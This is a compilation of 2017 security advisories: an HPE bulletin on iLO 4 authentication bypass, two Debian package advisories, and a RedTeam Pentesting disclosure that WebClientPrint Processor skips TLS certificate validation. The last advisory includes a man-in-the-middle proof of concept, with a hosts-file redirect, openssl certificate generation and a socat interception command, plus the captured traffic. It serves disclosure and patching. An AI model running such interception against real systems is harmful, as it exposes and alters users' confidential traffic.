Note: the current version of the following document is available here:https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_usSUPPORT COMMUNICATION - SECURITY BULLETINDocument ID: hpesbhf03769en_usVersion: 1HPESBHF03769 rev.1 - HPE Integrated Lights-out 4 (iLO 4) Multiple RemoteVulnerabilitiesNOTICE: The information in this Security Bulletin should be acted upon assoon as possible.Release Date: 2017-08-23Last Updated: 2017-08-23Potential Security Impact: Remote: Authentication Bypass, Code ExecutionSource: Hewlett Packard Enterprise, Product Security Response TeamVULNERABILITY SUMMARYA potential security vulnerability has been identified in HPE IntegratedLights-out (iLO 4). The vulnerability could be exploited remotely to allowauthentication bypass and execution of code.References: - CVE-2017-12542SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. - HP Integrated Lights-Out 4 (iLO 4), Prior to 2.53BACKGROUND CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector CVE-2017-12542 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
Hewlett Packard Enterprise would like to thank Fabien Perigaud of Airbus
Defense and Space CyberSecurity for reporting this vulnerability.
RESOLUTION
HPE has provided software updates to resolve the vulnerability in HPE
Integrated Lights-out 4 (iLO 4). Please upgrade to HPE Integrated Lights-out
4 (iLO 4) firmware version 2.53 or newer.
* The firmware is available at <http://www.hpe.com/support/ilo4>
HISTORY
Version:1 (rev.1) - 24 August 2017 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported
product:
Web form: https://www.hpe.com/info/report-security-vulnerability
Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.
- -------------------------------------------------------------------------
Debian Security Advisory DSA-3948-1 security@debian.org
https://www.debian.org/security/ Moritz Muehlenhoff
August 19, 2017 https://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : ioquake3
CVE ID : CVE-2017-11721
A read buffer overflow was discovered in the idtech3 (Quake III Arena)
family of game engines. This allows remote attackers to cause a denial
of service (application crash) or possibly have unspecified other impact
via a crafted packet.
For the oldstable distribution (jessie), this problem has been fixed
in version 1.36+u20140802+gca9eebb-2+deb8u2.
For the stable distribution (stretch), this problem has been fixed in
version 1.36+u20161101+dfsg1-2+deb9u1.
We recommend that you upgrade your ioquake3 packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
- -------------------------------------------------------------------------
Debian Security Advisory DSA-3950-1 security@debian.org
https://www.debian.org/security/ Luciano Bello
August 21, 2017 https://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : libraw
CVE ID : CVE-2017-6886 CVE-2017-6887
Debian Bug : 864183
Hossein Lotfi and Jakub Jirasek from Secunia Research have discovered
multiple vulnerabilities in LibRaw, a library for reading RAW images. An
attacker could cause a memory corruption leading to a DoS (Denial of
Service) with craft KDC or TIFF file.
For the oldstable distribution (jessie), these problems have been fixed
in version 0.16.0-9+deb8u3.
For the stable distribution (stretch), these problems have been fixed in
version 0.17.2-6+deb9u1.
We recommend that you upgrade your libraw packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
Advisory: WebClientPrint Processor 2.0: No Validation of TLS CertificatesRedTeam Pentesting discovered that WebClientPrint Processor (WCPP) doesnot validate TLS certificates when initiating HTTPS connections. Thus, aman-in-the-middle attacker may intercept and/or modify HTTPS traffic intransit. This may result in a disclosure of sensitive information andthe integrity of printed documents cannot be guaranteed.Details=======Product: Neodynamic WebClientPrint ProcessorAffected Versions: 2.0.15.109 (Microsoft Windows)Fixed Versions: >= 2.0.15.910Vulnerability Type: Improper Certificate ValidationSecurity Risk: mediumVendor URL: http://www.neodynamic.com/Vendor Status: fixed version releasedAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-011Advisory Status: publishedCVE: GENERIC-MAP-NOMATCHCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCHIntroduction============Neodynamic's WebClientPrint Processor is a client-side application,which allows server-side applications to print documents on a client'sprinter without user interaction, bypassing the browser's printfunctionality. The server-side application may be written in ASP.NET orPHP while on the client-side multiple platforms and browsers aresupported."Send raw data, text and native commands to client printers withoutshowing or displaying any print dialog box!" (Neodynamic's website)More Details============Upon installation under Microsoft Windows, WCPP registers itself as ahandler for the "webclientprint" URL scheme. Thus, any URL starting with"webclientprint:" is handled by WCPP. For example, enteringwebclientprint:-aboutin the URL bar of a browser opens the about box of WCPP.Neodynamic prodvides an online demo for test printing at the followingURL:http://webclientprint.azurewebsites.net/If visited via HTTPS, the WCPP component on the client-side will try tofetch the print job via HTTPS as well.Proof of Concept================To simulate a man-in-the-middle scenario, an entry similar to thefollowing was appended to the "hosts" file:------------------------------------------------------------------------
10.0.2.2 webclientprint.azurewebsites.net
------------------------------------------------------------------------
On the host 10.0.2.2, a self-signed certificate can be generated and
afterwards socat[1] can be used to intercept and display the encrypted
HTTP traffic as follows:
------------------------------------------------------------------------
$ openssl genrsa -out server.key 4096
$ openssl dhparam -out dhparam.pem 1024
$ openssl req -new -x509 -key server.key -out server.pem -days 365 \
-subj /CN=webclientprint.azurewebsites.net
$ cat server.key >> server.pem
$ cat dhparam.pem >> server.pem
$ sudo socat -v openssl-listen:443,reuseaddr,verify=0,fork,\
cert=server.pem openssl-connect:webclientprint.azurewebsites.net:443,\
verify=0
------------------------------------------------------------------------
The demo website is available via HTTPS using the following URL:
https://webclientprint.azurewebsites.net/
Any modern browser displays a warning due to the invalid TLS certificate
presented by socat.
On the contrary, WCPP simply accepts any certificate it is presented
with, when, for examplem printing a demo TXT file. Such a request is
given in the listing below. The output has been shortened and wrapped
manually for better readability.
------------------------------------------------------------------------
GET /DemoPrintFile.ashx?clientPrint&useDefaultPrinter=undefined&
printerName=null&filetype=TXT HTTP/1.0\r
Host: webclientprint.azurewebsites.net\r
User-Agent: WCPP/2.0.15.109(Windows; 6.1)\r
Accept-Encoding: gzip, deflate\r
\r
< 2015/09/07 10:29:27.478913 length=3538 from=0 to=3537
HTTP/1.1 200 OK\r
Cache-Control: private\r
Content-Length: 3180\r
Content-Type: application/octet-stream\r
Server: Microsoft-IIS/8.0\r
X-AspNet-Version: 4.0.30319\r
X-Powered-By: ASP.NET\r
Set-Cookie: ARRAffinity=23c01e1a9de38f884445e396de9940aef5941b9af3f6d9
cfa57066fe4d5fcb16;Path=/;Domain=webclientprint.azurewebsites.net\r
Date: Mon, 07 Sep 2015 08:29:27 GMT\r
Connection: close\r
\r
cpj..\v...\v..wcpPF:9c8d5316ffeb403d8be09565c2391f92.TXT|Printed By
WebClientPrint\r
=========================\r
\r
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Fusce urna
massa, eleifend non posuere quis, iaculis et libero. Curabitur lacinia
dolor non nisl pharetra tempus.
[...]
Etiam nisl nisi, eleifend vel molestie tincidunt, porttitor ac nunc.
Vestibulum vulputate magna gravida neque imperdiet ac viverra nulla
suscipit..Acopian Technical Company - 1 WebApp Lic - 2 WebServer
Lic|xxxxxxxxxxxxxxxxxxxxx
------------------------------------------------------------------------
This shows that WCPP does not verify TLS certificates when establishing
HTTPS connections.
Workaround
==========
Affected users should disable the WCPP handler and upgrade to a fixed
version as soon as possible.
Fix
===
Install a WCPP version greater or equal to 2.0.15.910[0].
Security Risk
=============
WCPP does not verify TLS certificates when establishing HTTPS
connections. Man-in-the-middle attackers can therefore intercept those
connections with little effort. This may lead to a disclosure of
confidential information if sensitive documents are printed via WCPP.
Furthermore, the integrity of the printed documents cannot be guaranteed
as attackers are able to modify the documents in transit.
The described attack requires a man-in-the-middle position which is a
rather strong prerequisite. It is therefore estimated that the
vulnerability poses a medium risk.
Timeline
========
2015-08-24 Vulnerability identified
2015-09-03 Customer approved disclosure to vendor
2015-09-04 Asked vendor for security contact
2015-09-04 CVE number requested
2015-09-04 Vendor responded with security contact
2015-09-07 Vendor notified
2015-09-07 Vendor acknowledged receipt of advisory
2015-09-15 Vendor released fixed version
2015-09-16 Customer asked to wait with advisory release until all their
clients are updated
2017-07-31 Customer approved advisory release
2017-08-22 Advisory released
References
==========
[0] https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/
[1] http://www.dest-unreach.org/socat/
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/
